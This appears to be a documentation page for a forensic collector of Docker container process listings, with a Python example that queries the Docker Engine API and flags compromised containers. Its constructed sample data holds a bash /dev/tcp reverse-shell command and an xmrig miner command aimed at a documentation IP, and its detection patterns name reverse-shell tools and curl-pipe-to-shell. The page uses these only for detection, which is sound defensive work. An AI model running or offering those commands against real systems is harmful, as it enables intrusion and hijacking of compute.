Docker Processes
Overview
Evidence: Docker Processes
Description: Collect Docker Processes
Category: Applications
Platform: macos
Short Name: docktops
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
Docker container process listings show which processes are running inside each container at collection time. This data reveals the container's actual workload and surfaces process injection, privilege escalation, and unauthorized process execution within containerized environments.
Data Collected
This collector gathers structured data about Docker processes: one record per process for each running container.
Collection Method
This collector queries the Docker daemon through the Docker Engine API and runs the equivalent of the ‘top’ command (GET /containers/{id}/top) for each running container; stopped containers have no processes and are not queried. For every process it records the PID, user, CPU usage, memory usage, and command line. The PIDs are those seen by the host running the daemon (on macOS, the Docker Desktop Linux VM), not the PIDs the processes see inside their own PID namespace, so they can be cross-referenced with host process data but not with PID values read from inside the container.
Forensic Value
Process data within containers identifies cryptominers, reverse shells, suspicious child processes, and privilege escalation attempts. Comparing the running processes against the expected workload for each container (for example, a web server container should be running its server binary and nothing else) helps detect compromised containers, malware, or unauthorized access to containerized applications. Typical indicators are a shell or network tool spawned as a child of an application process, a process running as root in a container whose image drops privileges, and a high-CPU process executing from a temporary or hidden directory.
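As an added example (not the collector's own code), the following Python script performs the collection described under Collection Method and the triage described under Forensic Value: it lists running containers and calls GET /containers/{id}/top through the daemon's Unix socket (both real Engine API endpoints, as is the ps_args query parameter), turns the Titles/Processes response into one record per process, then flags command lines matching a set of indicator patterns and lists executables not on an expected-workload allowlist. The socket path, the indicator patterns, the allowlist, and the sample API responses it runs against offline are constructed for illustration.

```python
"""Collect per-container process listings via the Docker Engine API and triage
them.  Added example for this page, not the collector's own code.  Real API
details: GET /containers/json, GET /containers/{id}/top and its ps_args query
parameter.  Constructed: socket path, indicator patterns, allowlist, samples."""
import http.client
import json
import os
import re
import socket
from urllib.parse import urlencode

DOCKER_SOCKET = "/var/run/docker.sock"  # assumed daemon socket path
# ps columns to request; the daemon runs `ps <PS_ARGS>`, keeps only the
# container's PIDs and returns the column headers as "Titles".
PS_ARGS = "-eo pid,ppid,user,%cpu,%mem,etime,args"


class UnixSocketHTTPConnection(http.client.HTTPConnection):
    """HTTP over the daemon's Unix socket (no TCP listener needed)."""
    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


class DockerAPI:
    """Minimal read-only Engine API client: GET a path, return parsed JSON."""
    def __init__(self, path=DOCKER_SOCKET):
        self.path = path

    def get(self, url):
        conn = UnixSocketHTTPConnection(self.path)
        conn.request("GET", url)
        resp = conn.getresponse()
        body = resp.read()
        conn.close()
        if resp.status != 200:
            raise RuntimeError(f"GET {url} -> {resp.status}: {body[:200]!r}")
        return json.loads(body)


def parse_top(container, payload):
    """Zip the response's Titles with each Processes row into a dict.  PIDs are
    the daemon host's (the Docker Desktop VM on macOS), not in-container PIDs."""
    titles = [t.lower() for t in payload.get("Titles", [])]
    rows = []
    for proc in payload.get("Processes") or []:  # may be empty/null for an idle container
        row = dict(zip(titles, proc))
        row["container"] = container
        rows.append(row)
    return rows


def collect_processes(api):
    """Enumerate running containers and run top in each."""
    records = []
    for c in api.get("/containers/json"):  # only running containers by default
        name = c["Names"][0].lstrip("/")
        url = f"/containers/{c['Id']}/top?" + urlencode({"ps_args": PS_ARGS})
        records.extend(parse_top(name, api.get(url)))
    return records


# Constructed indicator patterns applied to the ps "args" column (titled COMMAND).
INDICATORS = [
    ("cryptominer", re.compile(r"\b(xmrig|minerd|cpuminer|kinsing)\b|stratum\+tcp://", re.I)),
    ("reverse_shell", re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s|\bsocat\b.*exec:", re.I)),
    ("download_exec", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I)),
]


def flag_suspicious(rows):
    """Return (container, pid, label, command) for every indicator match."""
    hits = []
    for row in rows:
        cmd = row.get("command", "")
        for label, pat in INDICATORS:
            if pat.search(cmd):
                hits.append((row["container"], row["pid"], label, cmd))
    return hits


def unexpected_processes(rows, expected):
    """Compare each container's executables with an allowlist of expected workload
    binaries; return (container, pid, exe) for anything not on the list."""
    out = []
    for row in rows:
        tokens = row.get("command", "").split()
        exe = os.path.basename(tokens[0]).rstrip(":") if tokens else ""  # "nginx:" -> "nginx"
        if exe not in expected.get(row["container"], set()):
            out.append((row["container"], row["pid"], exe))
    return out


# Constructed sample responses shaped like real Engine API output so the example
# runs without a daemon.  203.0.113.10 is a documentation address.
SAMPLE_RESPONSES = {
    "/containers/json": [{"Id": "a1b2c3d4e5f6", "Names": ["/web"]},
                         {"Id": "f6e5d4c3b2a1", "Names": ["/worker"]}],
    "/containers/a1b2c3d4e5f6/top": {
        "Titles": ["PID", "PPID", "USER", "%CPU", "%MEM", "ELAPSED", "COMMAND"],
        "Processes": [
            ["4121", "4099", "root", "0.0", "0.1", "03:12:44", "nginx: master process nginx -g daemon off;"],
            ["4150", "4121", "nginx", "0.0", "0.1", "03:12:43", "nginx: worker process"]]},
    "/containers/f6e5d4c3b2a1/top": {
        "Titles": ["PID", "PPID", "USER", "%CPU", "%MEM", "ELAPSED", "COMMAND"],
        "Processes": [
            ["5202", "5180", "app", "0.3", "2.4", "01:05:10", "python /app/worker.py"],
            ["5311", "5202", "app", "98.7", "1.0", "00:14:02", "/tmp/.x/xmrig -o stratum+tcp://203.0.113.10:3333"],
            ["5340", "5202", "app", "0.0", "0.0", "00:13:58", "bash -c bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"]]},
}


class FakeDockerAPI:
    """Serves SAMPLE_RESPONSES, ignoring the query string the real client sends."""
    def get(self, url):
        return SAMPLE_RESPONSES[url.split("?", 1)[0]]


EXPECTED_WORKLOAD = {"web": {"nginx"}, "worker": {"python"}}  # constructed baseline


def demo(api=None):
    """Collect, then triage; pass DockerAPI() to run against a live daemon."""
    rows = collect_processes(api or FakeDockerAPI())
    return rows, flag_suspicious(rows), unexpected_processes(rows, EXPECTED_WORKLOAD)


if __name__ == "__main__":
    rows, hits, unexpected = demo()
    print(f"{len(rows)} processes; indicator hits: {hits}; off-baseline: {unexpected}")
```

Against the constructed sample the worker container yields two indicator hits (the xmrig miner and the /dev/tcp reverse shell) and the same two PIDs as off-baseline executables, while both nginx processes in the web container are clean. The allowlist check is the more general of the two: it catches an unfamiliar binary even when no indicator pattern matches, at the cost of needing a per-image baseline.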